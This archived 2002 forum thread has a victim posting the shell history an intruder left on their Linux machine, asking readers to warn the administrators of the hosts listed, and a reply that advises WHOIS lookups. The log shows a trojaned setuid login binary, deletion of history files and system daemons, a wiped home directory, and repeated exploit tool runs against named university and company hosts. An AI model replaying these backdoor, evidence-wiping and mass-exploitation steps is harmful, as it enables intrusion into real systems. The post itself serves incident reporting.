It is currently Mon, 18 Mar 2024 22:01:59 GMT



 
Author Message
 PLEASE READ THIS
I got hacked and this is the .bash_history left by the hacked.
There are several sites in here and if you happed to know
the IP/Domain, forward to the Admins so that something can be
done.
----------------
TERM=vt100
pico
gcc -o login bj.c
chown root:bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
cp /bin/login /usr/bin/old
rm /bin/login
chmod 555 /usr/bin/xstat
chgrp bin /usr/bin/xstat
mv login /bin/login
rm bj.c
rm /usr/sbin/rpc.mountd
ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h
; r
m /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history
rm /home/kargay
rm /home/kargay/.bash_history
cd /home/kargay
ls
rm -rf *
ls
cat /etc/passwd
cat /etc/hosts
cd .s/dsc
ls
cd .s
ls
./k 202.30.12.244
./k 202.30.48.72
./k 202.30.48.244
./k 202.30.93.154
./k 202.30.93.150
./k 203.230.221.37
cd .s
./d bncchile.cl
TERM=vt100
telnet bncchile.cll
telnet bncchile.cl
exit
mkdir .s
cd .s
ftp mail.bankduta.co.id
unzip linux.zip
chmod +x amdex
mv amdex k
chmod +x mountd
mv mountd d
./d athena.directnet.com.au
./d 202.61.237.123
./d 202.61.252.249
./d alcala.Math.Uni-Augsburg.DE
./d kant.Physik.Uni-Augsburg.DE
./d sozgeo3.Geo.Uni-Augsburg.DE
./d ranabib.rana.fylkesbibl.no
./d 128.39.153.88
./d nisse.gtf.ol.no
./k 212.47.198.113
./d ns1.software602.cz
./d koleje.inplus.cz
./d 212.47.13.197
./d 212.47.13.194
./d 212.47.13.202
./d 212.47.13.209
./d mail.sasbrno.cz
./k 63.198.12.20
cd .s
./k 131.125.74.2
./k 139.62.37.23
./d math-31623.coas.unf.edu
./d 202.61.252.249
./d blue7.mps.ohio-state.edu
./d sycamore.mps.ohio-state.edu
./d amy.mps.ohio-state.edu
./k 171.64.18.167
./d anya.Stanford.EDU
./d netops-9.Stanford.EDU
./d sul-hw-drobinson.Stanford.EDU
./k 209.8.2.235
./d 209.8.0.66
telnet localhost 274444
telnet localhost 27444
./k 134.7.1.50
./k 134.7.1.50
./k 134.7.1.85
./k 134.7.1.168
./k 134.7.2.200
./k 134.7.5.255
./k 134.7.5.254
./d 194.163.27.195
./k 195.224.16.14
cd .s
./k 165.230.67.132
./d rutadmin-smtp.rutgers.edu
./d rcrs-aquatics-scuba.rutgers.edu
./d aquatics.rutgers.edu
ls
ls
ls
cd .s
./d igpp2153.ucr.edu
./k 138.23.168.24
./k 138.23.168.40
./k 194.163.34.119
./k 194.163.86.132
./d woodpecker.poptel.org.uk
./d shirehorse.equiworld.com
./d ns0.jupiter.net.uk
./d news.jupiter.net.uk
./d metis.jupiter.net.uk
./d www.whitgift.croydon.sch.uk
./d oaktree.jupiter.net.uk
./d www.delta-anglia.co.uk
./d sflovers.rutgers.edu
./d scilsnet2-211.rutgers.edu
./d 202.155.4.252
./d 202.155.9.250
exit
cd .s
./k 128.211.161.83
./k 128.211.161.119
./k 128.211.226.122
./k 128.211.236.49
./k 131.170.195.19
dig @linux.quicksilver.org version.bind chaos txt
./d ocelot.lib.rmit.EDU.AU
./d euler.ls.rmit.edu.au
./d liberator.art.rmit.edu.au
./d pc37.et.rmit.edu.au
./d blackadder.cse.rmit.edu.au


 Fri, 02 Aug 2002 03:00:00 GMT   
 PLEASE READ THIS
go to www.arin.net and WHOIS the IPs he scanned. Email the contacts listed
there.  For domains, just type in 'whois domain' and get the contact info.

--buddy

Kar Gay Lim <kag...@hotmail.com> wrote:
: I got hacked and this is the .bash_history left by the hacked.
: There are several sites in here and if you happed to know
: the IP/Domain, forward to the Admins so that something can be
: done.
: ----------------
: TERM=vt100
: pico
: gcc -o login bj.c
: chown root:bin login
: chmod 4555 login
: chmod u-w login
: cp /bin/login /usr/bin/xstat
: cp /bin/login /usr/bin/old
: rm /bin/login
: chmod 555 /usr/bin/xstat
: chgrp bin /usr/bin/xstat
: mv login /bin/login
: rm bj.c
: rm /usr/sbin/rpc.mountd
: ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h
: ; r
: m /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history
: rm /home/kargay
: rm /home/kargay/.bash_history
: cd /home/kargay
: ls
: rm -rf *
: ls
: cat /etc/passwd
: cat /etc/hosts
: cd .s/dsc
: ls
: cd .s
: ls
: ./k 202.30.12.244
: ./k 202.30.48.72
: ./k 202.30.48.244
: ./k 202.30.93.154
: ./k 202.30.93.150
: ./k 203.230.221.37
: cd .s
: ./d bncchile.cl
: TERM=vt100
: telnet bncchile.cll
: telnet bncchile.cl
: exit
: mkdir .s
: cd .s
: ftp mail.bankduta.co.id
: unzip linux.zip
: chmod +x amdex
: mv amdex k
: chmod +x mountd
: mv mountd d
: ./d athena.directnet.com.au
: ./d 202.61.237.123
: ./d 202.61.252.249
: ./d alcala.Math.Uni-Augsburg.DE
: ./d kant.Physik.Uni-Augsburg.DE
: ./d sozgeo3.Geo.Uni-Augsburg.DE
: ./d ranabib.rana.fylkesbibl.no
: ./d 128.39.153.88
: ./d nisse.gtf.ol.no
: ./k 212.47.198.113
: ./d ns1.software602.cz
: ./d koleje.inplus.cz
: ./d 212.47.13.197
: ./d 212.47.13.194
: ./d 212.47.13.202
: ./d 212.47.13.209
: ./d mail.sasbrno.cz
: ./k 63.198.12.20
: cd .s
: ./k 131.125.74.2
: ./k 139.62.37.23
: ./d math-31623.coas.unf.edu
: ./d 202.61.252.249
: ./d blue7.mps.ohio-state.edu
: ./d sycamore.mps.ohio-state.edu
: ./d amy.mps.ohio-state.edu
: ./k 171.64.18.167
: ./d anya.Stanford.EDU
: ./d netops-9.Stanford.EDU
: ./d sul-hw-drobinson.Stanford.EDU
: ./k 209.8.2.235
: ./d 209.8.0.66
: telnet localhost 274444
: telnet localhost 27444
: ./k 134.7.1.50
: ./k 134.7.1.50
: ./k 134.7.1.85
: ./k 134.7.1.168
: ./k 134.7.2.200
: ./k 134.7.5.255
: ./k 134.7.5.254
: ./d 194.163.27.195
: ./k 195.224.16.14
: cd .s
: ./k 165.230.67.132
: ./d rutadmin-smtp.rutgers.edu
: ./d rcrs-aquatics-scuba.rutgers.edu
: ./d aquatics.rutgers.edu
: ls
: ls
: ls
: cd .s
: ./d igpp2153.ucr.edu
: ./k 138.23.168.24
: ./k 138.23.168.40
: ./k 194.163.34.119
: ./k 194.163.86.132
: ./d woodpecker.poptel.org.uk
: ./d shirehorse.equiworld.com
: ./d ns0.jupiter.net.uk
: ./d news.jupiter.net.uk
: ./d metis.jupiter.net.uk
: ./d www.whitgift.croydon.sch.uk
: ./d oaktree.jupiter.net.uk
: ./d www.delta-anglia.co.uk
: ./d sflovers.rutgers.edu
: ./d scilsnet2-211.rutgers.edu
: ./d 202.155.4.252
: ./d 202.155.9.250
: exit
: cd .s
: ./k 128.211.161.83
: ./k 128.211.161.119
: ./k 128.211.226.122
: ./k 128.211.236.49
: ./k 131.170.195.19
: dig @linux.quicksilver.org version.bind chaos txt
: ./d ocelot.lib.rmit.EDU.AU
: ./d euler.ls.rmit.edu.au
: ./d liberator.art.rmit.edu.au
: ./d pc37.et.rmit.edu.au
: ./d blackadder.cse.rmit.edu.au



 Fri, 02 Aug 2002 03:00:00 GMT   
 
   [ 2 post ] 

Similar Threads

1. PLEASE READ THIS MESSAGE (AND RESPOND) PLEASE!

2. Please, please READ

3. comp.os.linux.setup, new reader please read.

4. Is my computer suitable for Linux? (Please read)

5. Partition-please read!

6. PLEASE READ AND PASS IT ON

7. Question about kernel (Please Read)

8. News about LinuxHelpDesk - Please Read

9. Please read...

10. PLEASE READ THIS ONE


 
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Designed by ST Software